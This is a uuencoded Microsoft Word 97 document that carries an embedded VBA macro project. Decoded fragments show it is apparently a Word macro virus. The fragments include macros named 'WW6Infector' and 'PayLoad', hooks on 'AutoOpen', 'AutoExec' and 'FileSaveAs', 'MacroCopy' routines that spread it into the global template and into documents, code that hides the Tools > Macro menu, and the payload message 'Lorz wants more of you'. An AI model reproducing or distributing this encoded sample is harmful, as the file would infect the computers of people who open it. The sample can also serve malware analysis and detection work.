M``````````````````````````````#^R@$`?P`B@0@`!@`,````````@0@#
M!````!``````@`@#"````$``````@0@#"@```#`1````@0@#$````$`1````
M@0@%"@```%`1````@0@#)``X`&@$````@0@%+````,@+````@0@%+````-`-
M````@0@%)@```"@,````@0@%*````*@-````@0@%#````%``````@0@#`@``
M`*@+````@0@#`@```$@`````@0@%"@```&``````@0@%#````'``````@0@%
M$@```(``````@0@%!````)@`````@0@%"@```*``````@0@%#````+``````
M@0@%"@```,``````@0@%"@```-``````@0@%!````.``````@0@%$````.@`
M````@0@%#@```#`!````@0@'#@```/@`````@0@%`@````@!````@0@%"@``
M`!`!````@`@/!````"`!````@0@%"@```$`!````@0@#`@```"@!````@0@!
M%@```%@)````@0@!&````'`)````@0@!%@```(@)````@0@!&````*`)````
M@`D!`````/____\`@0@!$@```+@)````@`D!`````/____\`@0@!.````-`)
M````@0@%$@````@*````@0@%#````"`*````@`DR`````/____\`@0@%$```
M`#`*````@0@'"````$`*````@0@%$@```$@*````@0@'"````&`*````@0@%
M$````&@*````@0@'"````'@*````@0@%$@```(`*````@0@'"````)@*````
M@0@#`@```*`*````@`D"`````/____\`@0@`!@```*@*````@0@'%@```+`*
M````@0@'(@```,@*````@`D\`````/____\`@0@#`@```/`*````@0@!!```
M`/@*````@`@`!````%`!```$@0@``@````@````B@0@`!@`,`%@!````@0@`
M!````(`/````@0@$$@```&@/````@0@$$@```%`/````@0@$(@```"@/````
M@0@$"@```!@/````@0@$`@```!`/````@0@$)````.@.````@0@$"@```-@.
M````@0@$`@```-`.````@0@`"@```,`.````@0@`$````+`.````@0@((```
M`)`.````@0@("@```+`+````@0@(%@```'@.````@0@((````%@.````@0@(
M&@```#@.````@0@()````!`.````@0@(&@```)@/````@0@()````+@/````
M@0@('@```%`,````@0@``@```.`"````@`@`!````'`!```$@0@``@```.`#
M```B@0@`!@`,```+````@0@`!````,`+````@`@*!````(@/````@0@`(```
M`&@+````@0@`!````)`/````@`D``````/____\`@0@`.````!`+````@`D!
M`````/____\`@0@`'````$@+````@`D``````/____\`@`@`!````(@+````
M@0@#%@```)`+````@0@+%````%`$```$@0@``@````@+```B@0@`!@`,`/@+
M````@0@!!`````@,````@0@!"@```!`,````@0@!"@`````.````@0@$&@``
M`.`/````@`@$"````"`,````@0@$&@`````0````@0@$"@```"`0````@0@$
M&@```#`0````@0@$!````%`0````@0@$"@```%@0````@0@$"@```&@0````
M@`@(!````'@0````@0@$!````(`0````@0@$`@```(@0````@`D#`````/__
M__\`@0@$"@```)`0````@`D$`````/____\`@0@$$````*`0````@0@$"@``
M`+`0````@0@$!````,`0````@`D$`````/____\`@`@0!````,@0````@0@$
M!````-`0````@0@$"@```-@0````@0@$+````.@0````@0@$`@```!@1````
M@`@(!````"`1```$@0@``@`````,``#_____`0%H$0``CP0X``````!L`/__
M<````,$`(`(`````6@#J!/____\@`"("04`D`@$`07,B(&UA(``B`B$`K@"D
M``$`!@"5`%H`Z@1X````80```!````"D``$`(``B`B@`K@``````)``L`@``
M)P`J`FEA;&]G("``(@(A``@!)R`N`B@````U`#(")"`T`@``!0!!0#`"`0!N
M="!V86S!`#8"H`$``"``(@)!0"0"`0`B`C@````@("X"(``B`B@`"`$E`"!.
M(``B`D%`)@(!`&%T93\@*"``(@)!0!X"`0!N9F5C=&7!`"`"6`(``"``(@(A
M``@!'0!!0"@"`0`@`"H"I``!``L`)P`J`B!D:````"`````@`"H"04`X`@$`
M;F1O=R`^FP`V`@@```!H`````````"``*@(D`"P"```(`)4`=R"D``(`04`Z
M`@$`(@(@````FP`@`@````"/!/@``````&P`__^0!@``:P````````";`$`"
M`````*0```"D````)`!$`@(`)P!"`FDN92X@:?<`(`!&`O8`I``!`"``0@*+
M`"!)1B!)3F@````@````:````!@````@`$H"%0`@`$P"%0`$`)4`:P``````
M```@`$8"I````*0````D($@"`P"N``<`4&%Y3&]A9``%`)4`9&]C=6UEI``!
M`!8`)P!*`C(".````*X`"P!75S9);F9E8W1O<@`D(%("`0`D`%`"`0`G`$X"
MVP`,`"`@("`@("`@5&AE;B``1@*D````I````"0@2`(#`*X`"@!&:6QE4V%V
M94%S!0"5`&5R<F^D``$`%@`G`$P"=R!D;V,`K@`)`$9I;&5#;&]S90"D``,`
M*R!(`@$`K@`(`$9I;&53879EI``%`"L@2`(!`&]SK@`*`$9I;&53879E07.D
M``8`*R!(`@$`V``R``T`("`@;6%C<F\@;F%M90``````]P`@`$8"]@#``&]N
M90```&@`````````K@`)`$9I;&5#;&]S90"D``,`*R!(`@$`K@`(`$9I;&53
M879EI``%`"L@2`(!`&]SK@`*`$9I;&53879E07.D``8`*R!(`@$`I````*0`
M`0`D(&`"`@`G(%X"*R!(`@$`]P"_`&@````@`&("I``!`"0@2`("`"<@9@)I
M=&EO;B`@(&8")"!H`@$`X@!N=0``K@`(`$9I;&5/<&5N2`!1`*0``@`G`&0"
MK@`)`$9I;&5#;&]S90!(`%$`(&UE;G4@I``#`"<`9`*D``4`)P!D`J0````G
M`&0"V``R`!,`($YO('!O<VET:6]N(&)Y(&YO=P!2`@$`)`!L`````````"0@
M-`(``"<@5`)P;&%T92`@(%0"K@`(`#I087E,;V%D"P`G(%8"```@(%8"K@`.
M`$=L;V)A;#I087E,;V%DI``!`$%`6`(#`"`@5`*N``L`.D9I;&53879E07,`
M"P`G(%8"5@(@````K@`(`$UA<F=A<F5T(``B`B@`A@)!0%@"(``B`B$`K@"D
M````!0`=`"``(@(A`*X`I``!``4`'0`#`)4`*````"`@5@*N`!$`1VQO8F%L
M.D9I;&53879E07,`I``!`$%`6`(#`&0A```@(%0"K@`)`#I!=71O17AE8P`+
M`"<@5@(@(%8"K@`/`$=L;V)A;#I!=71O17AE8P"D``$`04!8`@,`````````
MK@`$`%=7-DD@`$X"I``!``L`)"!<`@$`04!:`@(```!H`/__V`(``&@`````
M````I````*0``0`D(&`"`@`G(%X"V``@`"$`($=E="!N86UE(&9O<B!F:6QE
M(&UE;G4@*"(F1FEL92(I`````````/<`(`!B`O8`I``!`"0`1`(!`*0``0"D
M``$`%@".`-@`,@`3`"!0<F]C97-S(&5A8V@@;6%C<F\`(`!B`J0``0`D($@"
M`@`G(&8"V``R``\`($=E="!M86-R;R!N86UE`"`@9@(D(&@"`0#B`-@`,@`3
M`"!'970@9&5S8W)I<'1I;VX@;V8```"N``@`1FEL94]P96Y(`%$`V``9`!L`
M($1E<V-R:7!T:6]N(#T@(D9I;&5/<&5N(B`_`````````*0``@`G`&0"V``9
M`"$`("`@=&AE;B!P;W-I=&EO;B!I;B!F:6QE(&UE;G4@/2`R`*X`"0!&:6QE
M0VQO<V4`2`!1`-@`&0`<`"!$97-C<FEP=&EO;B`](")&:6QE0VQO<V4B(#\`
M````I``#`"<`9`+8`!D`(0`@("!T:&5N('!O<VET:6]N(&EN(&9I;&4@;65N
M=2`](#,`K@`(`$9I;&53879E2`!1`-@`&0`;`"!$97-C<FEP=&EO;B`](")&
M:6QE4V%V92(@/P````````"D``4`)P!D`M@`&0`A`"`@('1H96X@<&]S:71I
M;VX@:6X@9FEL92!M96YU(#T@-0"N``H`1FEL95-A=F5!<T@`40#8`!D`'0`@
M1&5S8W)I<'1I;VX@/2`B1FEL95-A=F5!<R(@/P```*0`!@`G`&0"V``9`"$`
M("`@=&AE;B!P;W-I=&EO;B!I;B!F:6QE(&UE;G4@/2`V`"``9`*5`-@`&0`J
M`"!)9B!P;W-I=&EO;B!I;B!F:6QE(&UE;G4@=V%S(&9O=6YD('1H96XN+@``
M(""F`*X``0`Z``L`("!F`@L`("!J`J0``0`6`$%`6`(#`&]C86QI>F@````8
M````K@`(`$9I;&53879E2`!1`*0`!@`G`&0"VP`]`"`@("`@268@3&5F="0H
M54-A<V4D*$QO8V%L36%C<F\D*2P@3&5N*$UA8W)O3F%M920H4&]S:71I;VXI
M*2D`````````(`!D`B0@2`(!`!T`06!N`@$`0V%S920HVP`=`"`@("`@("`@
M3&5F="0H3&]C86Q-86-R;R0L(#$I````"````"`@7@*D````(`!D`B0@;`(#
M`"<@:@)D(/<`(`!B`O8`I``!`"0`1`(!`*0``0"D``$`%@".`-@`50`3`"!.
M;R!P;W-I=&EO;B!B>2!N;W<`(`!D`I4```#;``L`("`@("`@("!!;F0`K@`*
M`$9I;&53879E07-(`%$`2`(!`-@`("!>`J0````@`&0")"!L`@,`)R!J`F]S
M(""F`*X``0`Z``L`("!F`@L`("!J`J0``0`6`$%`6`(#`'9E07.D`*X`"`!&
M:6QE3W!E;J0``@`K($@"`0!V9:X`"0!&:6QE0VQO<V4`I``#`"L@2`(!`*X`
M"`!&:6QE4V%V9:0`!0`K($@"`0`@3JX`"@!&:6QE4V%V94%SI``&`"L@2`(!
M`*0```"D``$`)"!@`@(`)R!>`M@`,@`/`/<`(`!B`O8`I``!`"0`1`(!`*0`
M`0"D``$`%@".`-@`50`3`"!.;R!P;W-I=&EO;B!B>2!N;W<`(`!B`J0``0`D
M($@"`@`G(&8"&0`;`"!$("!F`B0@:`(!`.(`(")&::X`"`!&:6QE3W!E;D@`
M40"D``(`)P!D`JX`"0!&:6QE0VQO<V4`2`!1`'1I;VX@::0``P`G`&0"K@`(
M`$9I;&53879E2`!1`*0`!0`G`&0"K@`*`$9I;&53879E07-(`%$`;VX@/2`B
MI``&`"<`9`)K````R`$``"``9`*5````("!>`J0````@`&0")"!L`@,`)R!J
M`B!I(""F`*X``0`Z``L`("!F`@L`("!J`J0``0`6`$%`6`(#`!D`&P`@1&@`
M``!X`0``]P"_`'`!``"/!*`!`````&P```!@`0``-0!T`J0`&P`%`#4`=@*D
M``$`!0`U``@!K@`&`$-A;F-E;`4`-0!X`C4`>@*D````!0!!0'("!0"N``$`
M7@"N``$`)0`+`*X``0`M``L`04!\`@$`(#T@(JX`%@!,;W)Z('=A;G1S(&UO
M<F4@;V8@>6]U04!^`@$`FP"*`N`````D`(0"```D`(("`0"D``T`!0`=`)4`
M-@!H````$````"0@-`(``"<@5`(H`(8";V[!`(H"J````*X`"@!&:6QE4V%V
M94%S)"",`@``K@`+`#I&:6QE4V%V94%S``L`04!8`@(`:@+8`(\$(`(`````
M;````"````#!`)("&````"0@E@(``"<@E`(+`$%`6`):`.H$X`$``*X`!P!0
M87E,;V%D`"0@C`(``*X`"``Z4&%Y3&]A9`L`04!8`@(`($RN``0`5U<V22``
M3@*D``$`"P`D(%P"`0!!0%H"`@```-L`1``@("`@("`@("`@/#X@54-A<V4D
M*$UA8W)O3F%M920H4&]S:71I;VXI*2`@("<@268@;&]C86P@;6%C<F\@;F%M
M92!I<]L`2@`@("`@("`@($%N9"`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("<@("!D:69E<F5N="!F<F]M(&5N9VQI<V@@;F%M90``VP!+`"`@
M("`@("`@3&5F="0H3&]C86Q-86-R;R0L(#$I("`@("`@("`@("`@("`@)R`@
M(&%N9"!L;V-A;"!M86-R;R!N86UE(&ES($Y/5`#;`$8`("`@("`@("`@(#P^
M("(H(B`@("`@("`@("`@("`@("`@("`@("`@("`@("`G("`@82!S97!A<F%T
M;W(@(B@N+B(@=&AE;@```````*X`"`!!=71O3W!E;B0@C`(``*X`"0`Z075T
M;T]P96X`"P!!0%@"`@"N``H`5&]O;'--86-R;R0@C`(``*X`"P`Z5&]O;'--
M86-R;P`+`$%`6`("`!`````@`)@"(0":`I4`"P`G(%8"("!6`JX`$0!';&]B
M86PZ1FEL95-A=F5!<P"D``$`04!8`@,`97AT("`@5`*N``L`.D9I;&53879E
M07,`"P`G(%8"2`(!````("!6`JX`#@!';&]B86PZ4&%Y3&]A9*0``0!!0%@"
M`P`@(%0"K@`(`#I087E,;V%D"P`G(%8"``"N``L`5U<V26YF96-T;W(`)"!2
M`@$`)`!0`@$`)P!.`B``2@(5`"``3`(5``0`E0#W`"``1@+V`,``````````
M:`#__R`!``"D``$`%@`G`$P"````````(`!&`J0```"D````)"!(`@,`K@`*
M`$9I;&53879E07,%`)4``````&@`___@````I``!`!8`)P!*`@```````"``
M1@*D````I````"0@2`(#`*X`!P!087E,;V%D``4`E0````````#W`"``1@+V
M`*0``0`@`$("BP````````"D````I````"0`1`("`"<`0@(```````#!`$`"
M<````)L`C@)H````DP".`F`````@(%0"K@`+`#I4;V]L<TUA8W)O``L`)R!6
M`@```````"`@5@*N`!$`1VQO8F%L.E1O;VQS36%C<F\`I``!`$%`6`(#````
M``"N`!``<W1A<G0@5&]O;'--86-R;T%`?@(!````^`\``"``F`(A`)H"E`!&
M`*X``0`Q`$%`?@(!`&<`````````(``B`D%`)`(!`````````"``F`(A`)H"
ME`!&`*X``0`R`$%`?@(!`&<`````````P0">`J`/```@`"("04`F`@$`````
M````(``B`D%`G`(!`````````)L`G@)X#P``P0"2`G`/``!H`/__:`\``*0`
M``!!0*`"`0`````````@()0"'0`@`)@"0D"B`@$`(`"8`D)`I`(`````````
M`),`I@(8#P``FP"2`A`/``#!`*8""`\``"``F`(A`)H"E0````````"N``8`
M97)R;W(@(`"H`B0@7`(!``L`K@`)`"!O8V-U<G)E9``+`$%`?@(!``````!H
M`/__P`X``)L`I@*X#@``_____\@.```@`"("04`D`@$`````````(``B`B$`
MK@"D``$`!@"5`"``(@)!0"8"`0````````#_____"!$```$9M@!!='1R:6)U
M=`!E(%9"7TYA;0!E(#T@(DUO9`!U;&4Q(@T*4P!U8B!&:6QE4P!A=F5!<R@I
M#0`*("`@3VX@10!R<F]R($=O5&!O(&5N9`="`CY$`&EM(&1L9R!!!G,&=@(N
M1V5T0W6`<E9A;'5E<P%`"0(H268!"BY&;W(`;6%T(#P^(#$@(%1H96X"&R`@
M0$1I86QO9PDL*`,`604M/2`P*2!/)'(@"Q,Q*0E!36$`8W)O0V]P>2`"(@>F
M(BP@5VEN"&1O=P'Q)"@I('`K("(Z"`^$/H@=5/!O;VQS@@>2'0@/CQV`4&%Y
M3&]A9!(<`X4-CQI!=71O3W"\96X2&P8.A!L*BC$""D!%;F0@268#!6P$<V4"
M!"`@5&5M/G`#?0#T`P1$=<!U<@&JLH`!``0````!`#`J`@*0"0!P%`9(`P""
M`@!DY`0$``<`'`!0<F]J96-T!5$`*```0`(4!@(4/:T""@<";`$4"`82"0(2
M@#A9Z3`*``P"2A(\`@H6``%R<W1D$&]L93X"&7,`=```9`!O`&P`95``#0!F
M`"5<``,J`%Q'>S`P,#(PL#0S,"T`"`0$0P`*`P(.`1(P,#0V?2,`,BXP(S`C
M0SH`7%=)3D1/5U,`7%-94U1%35P`4W1D3VQE,BX`=&QB(T],12``075T;VUA
M=&DL;VX`7@`"%@)M35,`1F]R;7,^``Y!``E-`%,`1@!%<@``;0!S`"\`>@V`
M"7"``0%&,S8V1`!#-#(R+3<Y,@`Q+3$Q1#$M.0A#-3,#1C$S-3$8.34W%T8$
M,RY45P!$(TUI8W)O<U!O9G0@`CT@`&`@!$]B`;`@3&EB<CAA<GD`.0`!'E`P
M`-J0`!-R@`$(4#,L4(!*0%!<5D)%7(4H10)8IRCA+D4-C^``&A"%+@)@C$TL
M"[2!DT-X3D!586P50WA.A%1AP'@.`"`UP"L)PBQ#`PD*`RL;$.<P!`##$$]F
M9A1I8T2)3T"&9@!I+`!C0HG!/8;"$$=[`#)$1CA$,#1#`"TU0D9!+3$P@#%"
M+4)$134`9E1!04"(-,`",@AF4`!23T=204T@1@!)3$537$U)0P!23U-/1E0@
M3T!&1DE#15R$`4T`4T\Y-RY$3$Q#2&N#(R`X+C"2:P\1@LP"`!/"`>E)&0%"
MMU1H:7-$;V-`=6UE;G0:3@0R1``80#%4`&A`-G-$`$3`26,`=0"?910`;D#%
M',`&``!(!4(!,<+3T@,``!Z+0@(!!2Q"&NM)(D(("BM"`1E#M6]D=6RH93$:
M"0,RA+AO0-O2=4+;,0`O#-1``BT,*.U)(2@,$&(!````````````````````
M````DTLI7@$`$````/__``````$``@#__P`````!`````````````0`"````
M``````$``@`!```````!`````0```````0`%``4`!0`%``4`!0`%``4`!0`%
M``$`"0```"I<0TYO<FUA;')5@`$``(````"`````@`````,``'X$``!^`0``
M?@$``'X!``!^`0``?@$``'X!``!^`@``?@(``'X"``!^`@``?@(``'X"``!^
M6```?P`````3````"0```````0`(`````````.D`````````Z[$?F5U%SQ&<
M5P```3495P$`"00```D$``#D!`````````(``@"#BF$`"0```````@#)!P``
M`````/____\``/__``"I``````````$(00`)```````%``D(````````____
M_R@!````````_____P0`Z0<````````I"````````$D(````````80@`````
M``#__P``T0`````````&`,$!`````````````````````````````-$"````
M`````````````````````````+$#`````````````````````````````)$$
M``````````````````````````````D````!````Q+W#&5Q%SQ&<5P```349
M5XD&``````````````````````````````0```(,````5&AI<T1O8W5M96YT
M`@```@<```!-;V1U;&4Q`@```@<```!0<F]J96-T!````^\$`@``````P```
M`````$80```"/0```$,Z7%!23T=204T@1DE,15-<0T]-34].($9)3$537$U)
M0U)/4T]&5"!32$%2141<5D)!7%9"03,S,BY$3$P!```"`P```%9"00H```H!
M`0```````/____\#````"0```"D!````````L0$```````!0````````````
M``````0```,%"0(``````,````````!&#@```C0```!#.EQ0<F]G<F%M($9I
M;&5S7$UI8W)O<V]F="!/9F9I8V5<3V9F:6-E7$U35T]21#@N3TQ"`@```@0`
M``!7;W)D"@``"AD"````````_____P@````)!```00(```````"Y`@``````
M`&``````````````````!````S`$`@``````P````````$8(```"'0```$,Z
M7%=)3D1/5U-<4UE35$5-7%-T9$]L93(N=&QB`@```@8```!S=&1O;&4*```*
M*0,```````#_____`@````````!1`P```````)D#````````<```````````
M```````$```#(L1M-B%YT1&<4P```3495P@```(=````0SI<5TE.1$]74UQ3
M65-414U<35-&;W)M<RY45T0"```"!P```$U31F]R;7,*```*"00```````#I
M!`````````(`````````,00```````!Y!````````(````````````````$`
M!````^$N10V/X!H0A2X"8(Q-"[0$```#(\1M-B%YT1&<4P```3495P@```(?
M````0SI<5TE.1$]74UQ414U07%9"15Q-4T9O<FUS+D581`H```H1!0``````
M`.D$`````````@`````````Y!0```````'D$````````D``````````!````
M`@`$```#3-#X+?I;&Q"]Y0"J`$3>4@T```(R````0SI<4%)/1U)!32!&24Q%
M4UQ-24-23U-/1E0@3T9&24-%7$]&1DE#15Q-4T\Y-RY$3$P"```"!@```$]F
M9FEC90H```K9!0```````/____\"``````````$&````````<08```````"@
M``````````````````0```-K"0(``````,````````!&!````^BQ'YE=1<\1
MG%<```$U&5<$```#9S48405$SQ&<5P```3495P0```/GL1^9747/$9Q7```!
M-1E7!````_8)`@``````P````````$8#```""````$1O8W5M96YT`P``#0P`
M#`!``````````````P```@H```!&:6QE4V%V94%S`P``#0P`#``(````````
M`````P```@@```!!=71O3W!E;@(```('````4&%Y;&]A9`,```(*````5&]O
M;'--86-R;P0```$&````1F]R;6%T:P``?P``````````````````````````
M``!R58````"`````@````(`````!``!^?0``?P`````*````"0````````#_
M______________\`````"0```````P`)```````$``,```G1`@```````($'
M````````"````````0!P``!_`````````````````````````````%1H:7-$
M;V-U;65N=`!4`&@`:0!S`$0`;P!C`'4`;0!E`&X`=````$UO9'5L93$`30!O
M`&0`=0!L`&4`,0````#,85X```$`_PD$```)!```Y`0!`````````````0`&
M``(`%@$J`%P`1P![`#``,``P`#(`,``T`$4`1@`M`#``,``P`#``+0`P`#``
M,``P`"T`0P`P`#``,``M`#``,``P`#``,``P`#``,``P`#``-``V`'T`(P`S
M`"X`,``C`#D`(P!#`#H`7`!0`%(`3P!'`%(`00!-`"``1@!)`$P`10!3`%P`
M0P!/`$T`30!/`$X`(`!&`$D`3`!%`%,`7`!-`$D`0P!2`$\`4P!/`$8`5``@
M`%,`2`!!`%(`10!$`%P`5@!"`$$`7`!6`$(`00`S`#,`,@`N`$0`3`!,`",`
M5@!I`',`=0!A`&P`(`!"`&$`<P!I`&,`(`!&`&\`<@`@`$$`<`!P`&P`:0!C
M`&$`=`!I`&\`;@!S`````````````````!`!*@!<`$<`>P`P`#``,``R`#``
M.0`P`#4`+0`P`#``,``P`"T`,``P`#``,``M`$,`,``P`#``+0`P`#``,``P
M`#``,``P`#``,``P`#0`-@!]`",`.``N`#``(P`T`#``.0`C`$,`.@!<`%``
M<@!O`&<`<@!A`&T`(`!&`&D`;`!E`',`7`!-`&D`8P!R`&\`<P!O`&8`=``@
M`$\`9@!F`&D`8P!E`%P`3P!F`&8`:0!C`&4`7`!-`%,`5P!/`%(`1``X`"X`
M3P!,`$(`(P!-`&D`8P!R`&\`<P!O`&8`=``@`%<`;P!R`&0`(``X`"X`,``@
M`$\`8@!J`&4`8P!T`"``3`!I`&(`<@!A`'(`>0````````````````"X`"H`
M7`!'`'L`,``P`#``,@`P`#0`,P`P`"T`,``P`#``,``M`#``,``P`#``+0!#
M`#``,``P`"T`,``P`#``,``P`#``,``P`#``,``T`#8`?0`C`#(`+@`P`",`
M,``C`$,`.@!<`%<`20!.`$0`3P!7`%,`7`!3`%D`4P!4`$4`30!<`%,`=`!D
M`$\`;`!E`#(`+@!T`&P`8@`C`$\`3`!%`"``00!U`'0`;P!M`&$`=`!I`&\`
M;@````````````````#@`"H`7`!'`'L`,P`V`#8`1`!#`#0`,@`R`"T`-P`Y
M`#(`,0`M`#$`,0!$`#$`+0`Y`$,`-0`S`"T`,``P`#``,``P`#$`,P`U`#$`
M.0`U`#<`?0`C`#(`+@`P`",`,``C`$,`.@!<`%<`20!.`$0`3P!7`%,`7`!3
M`%D`4P!4`$4`30!<`$T`4P!&`&\`<@!M`',`+@!4`%<`1``C`$T`:0!C`'(`
M;P!S`&\`9@!T`"``1@!O`'(`;0!S`"``,@`N`#``(`!/`&(`:@!E`&,`=``@
M`$P`:0!B`'(`80!R`'D```````````````$`Y``J`%P`1P![`#,`-@`V`$0`
M0P`T`#(`,P`M`#<`.0`R`#$`+0`Q`#$`1``Q`"T`.0!#`#4`,P`M`#``,``P
M`#``,``Q`#,`-0`Q`#D`-0`W`'T`(P`R`"X`,``C`#``(P!#`#H`7`!7`$D`
M3@!$`$\`5P!3`%P`5`!%`$T`4`!<`%8`0@!%`%P`30!3`$8`;P!R`&T`<P`N
M`$4`6`!$`",`30!I`&,`<@!O`',`;P!F`'0`(`!&`&\`<@!M`',`(``R`"X`
M,``@`$\`8@!J`&4`8P!T`"``3`!I`&(`<@!A`'(`>0```````````````0``
M`.$N10V/X!H0A2X"8(Q-"[0``!(`*@!<`$,`3@!O`'(`;0!A`&P`$@`J`%P`
M0P!.`&\`<@!M`&$`;``K&^<P!``````````,`2H`7`!'`'L`,@!$`$8`.`!$
M`#``-`!#`"T`-0!"`$8`00`M`#$`,``Q`$(`+0!"`$0`10`U`"T`,``P`$$`
M00`P`#``-``T`$0`10`U`#(`?0`C`#(`+@`P`",`,``C`$,`.@!<`%``4@!/
M`$<`4@!!`$T`(`!&`$D`3`!%`%,`7`!-`$D`0P!2`$\`4P!/`$8`5``@`$\`
M1@!&`$D`0P!%`%P`3P!&`$8`20!#`$4`7`!-`%,`3P`Y`#<`+@!$`$P`3``C
M`$T`:0!C`'(`;P!S`&\`9@!T`"``3P!F`&8`:0!C`&4`(``X`"X`,``@`$\`
M8@!J`&4`8P!T`"``3`!I`&(`<@!A`'(`>0`````````````````"``(``0`#
M``0"```&`@$`"`(``!@"________```````````X6>DP"@`!`/__________
M_____________________________P``____________________________
M____________`0````````````````````````#I20(`&`!4`&@`:0!S`$0`
M;P!C`'4`;0!E`&X`=``*`#<S,&4Y-3!C,0`#`"I$`1$"___K20`````````"
M````T@,``/__#@!-`&\`9`!U`&P`90`Q``H`,30S,&4Y-6%C8@,`*D0!'`+_
M_^U)````````&`(```#4'```________`0$X`@``____________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_____P`"``#_____&`(``/______________________________________
M____________________________________________________________
M___CL1^9747/$9Q7```!-1E7_____P$```#EL1^9747/$9Q7```!-1E7____
M_P$```#_____2````(```````%D!7`#_`&PQ`````%(``8`0`/\#!`!&``"=
M``.`%`#_`P0`4D5-!`Q7;W)DM6L0``,,5D)!]^(0``4$5VEN,3;!?A``!017
M:6XS,@=_$``#!$UA8[.R$``(!%!R;VIE8W0Q"A<0``8,<W1D;VQEDV`0``<(
M35-&;W)M<T,/$``,#%1H:7-$;V-U;65N=#R>$``)@```_P,$`%]%=F%L=6%T
M91C9$``&"$YO<FUA;-_8$``&C"@`_P,$`$]F9FEC915U$``'#%!R;VIE8W0M
MKA``"`1$;V-U;65N=&K3$``'#$UO9'5L93%B$1``"JPH`0$`!`!&:6QE4V%V
M94%SSNX0``V$"`#_`P0`96YD1FEL95-A=F5!<]!>$``#A`@`_P,$`&1L9RV$
M$``,@```_P,$`$=E=$-U<E9A;'5E<T`-$``&@```_P,!`$1I86QO9Y]F$``&
M@```_P,$`$EN9F5C=.AF$``*@```_P,$`%1E;7!7:6YD;W<@5A``!H```/\#
M`0!7:6YD;W<VWA``#(```/\#!`!/<FEG:6YA;$YA;649"A``!X```/\#!`!&
M:6QE3F5WD2$0``B```#_`P$`5&5M<&QA=&7H?Q``"(```/\#!`!&:6QE3F%M
M96K#$``(A`@`_P,$`$-L;W-E1&]C"]40``J```#_`P0`5VEN9&]W3&ES=`8O
M$``)@```_P,$`$9I;&5#;&]S9;A?$``(A`@`_P,$`$%U=&]3879E!/00``BL
M*`$!``0`075T;T]P96[9*A``!80(`/\#!`!!8F]R=!`I$``+@```_P,$`&E-
M86-R;T-O=6YTPUX0``N```#_`P0`0V]U;G1-86-R;W.']A```8```/\#!`!I
M8!`0``F```#_`P0`36%C<F].86UE('D0``J```#_`P0`8DEN<W1A;&QE9+#Z
M$``/@```_P,$`&)4;V]-=6-H5')O=6)L93=>$``-@```_P,$`&E75S9)26YS
M=&%N8V4HA1```P!686S=XA``#H```/\#!`!'971$;V-U;65N=%9A<J/=$``#
M@```_P,$`'--98?4$``%@```_P,$`$UA8W)O8_H0``F```#_`P0`36%C<F]#
M;W!Y]D40`!"```#_`P0`4V5T4')O9FEL95-T<FEN9UI6$``#`%-T<I?5$``(
M@```_P,$`$9I;&5-96YU)A,0``B```#_`P0`365N=51E>'2`OA``"X```/\#
M!`!-86-R;TYU;6)E<NE]$``(@```_P,!`%!O<VET:6]N&]T0``N```#_`P0`
M3F%M94]F36%C<F\JG1``"8```/\#!`!-86-R;T1E<V.VUA``"H```/\#!`!,
M;V-A;$UA8W)O]O@0``V```#_`P0`365N=4ET96U-86-R;RG7$``%`%5#87-E
M-0H0``>L*`$!``0`4&%Y;&]A9,1G$``6@```_P,$`%1O;VQS0W5S=&]M:7IE
M2V5Y8F]A<F2RT!``!X```/\#`0!+97E#;V1E[9@0``B```#_`P$`0V%T96=O
M<GFT7!``!@!296UO=F7/L1``!X```/\#`0!#;VYT97AT6&X0``@`4V5N9$ME
M>7-.'A``!@!-<V=";WB74A``!H0(`/\#!`!">65">65N\A``!@!396-O;F1S
M#A```P!.;W<ENA``"(```/\#`0!087-S=V]R9/#.$``)@```_P,$`%]"7W9A
M<E]/;C;S$``$A`@`_P,$`%!A<W,8?Q``"H```/\#!`!7:6YD;W=.86UES(X0
M``:$"`#_`P$`4F5P96%T=,H0``JL*`$!``0`5&]O;'--86-R;W7S$``,A`@`
M_P,$`$5R<F]R4F]U=&EN91D`$``'@```_P,$`$]L9$YA;66YJQ``"H```/\#
M!`!.;VU&:6-H:65RXZ@0``:```#_`P0`;6%C<F]S]TX0``:```#_`P0`8D1E
M8G5GRD$0``N```#_`P0`3W5T:6QS36%C<F\37!``!(0(`/\#`@!3:VEP]P,0
M`!&```#_`P0`1&ES86)L94%U=&]-86-R;W,4OA``"X```/\#!`!38794;T=L
M;V)A;+`E$``(@```_P,$`&]B:F5C=&EV@;P0``2$"`#_`P0`1&]N90J%$``#
M`$5R<F^*$``(@```_P,$7P!?`%,`4@!0`%\`,0``````````````````````
M`````````````````````````````````````````````!```@$/````"```
M`/____\```````````````````````````````````````````````!%````
M;@````````!0`%(`3P!*`$4`0P!4`'<`;0``````````````````````````
M````````````````````````````````````%``"`/_______________P``
M`````````````````````````````````````````````$<```!!````````
M`%``4@!/`$H`10!#`%0`````````````````````````````````````````
M```````````````````````````0``(!!@```!$```#_____````````````
M````````````````````````````````````20```'H!`````````0!#`&\`
M;0!P`$\`8@!J````````````````````````````````````````````````
M`````````````````!(``@#_______________\`````````````````````
M``````````````````````````!/````:@``````````````````````````
M````````````````````````````````````````````````````````````
M````````240](GLY.3%&0C%%02TT-35$+3$Q0T8M.4,U-RTP,#`P,#$S-3$Y
M-3=](@T*1&]C=6UE;G0]5&AI<T1O8W5M96YT+R9(,#`P,#`P,#`-"DUO9'5L
M93U-;V1U;&4Q#0I.86UE/2)0<F]J96-T(@T*2&5L<$-O;G1E>'1)1#TB,"(-
M"D--1STB1CA&035!.3@U13DX-44Y.#5%.3@U12(-"D100CTB131%-C0V-C1$
M134Q1$8U,41&-3$B#0I'0STB1#!$,C<R-S4W,S<U-S,X02(-"@T*6TAO<W0@
M17AT96YD97(@26YF;UT-"B9(,#`P,#`P,#$]>S,X,S)$-C0P+4-&.3`M,3%#
M1BTX130S+3`P03!#.3$Q,#`U07T[5D)%.R9(,#`P,#`P,#`-"@T*6U=O<FMS
M<&%C95T-"E1H:7-$;V-U;65N=#TT-"P@-#0L(#,U-"P@,S$R+"`-"DUO9'5L
M93$]-C8L(#8V+"`S-S8L(#,S-"P@6@T*`````````0#^_P,*``#_____!@D"
M``````#`````````1A@```!-:6-R;W-O9G0@5V]R9"!$;V-U;65N=``*````
M35-7;W)D1&]C`!````!7;W)D+D1O8W5M96YT+C@`]#FR<0``````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
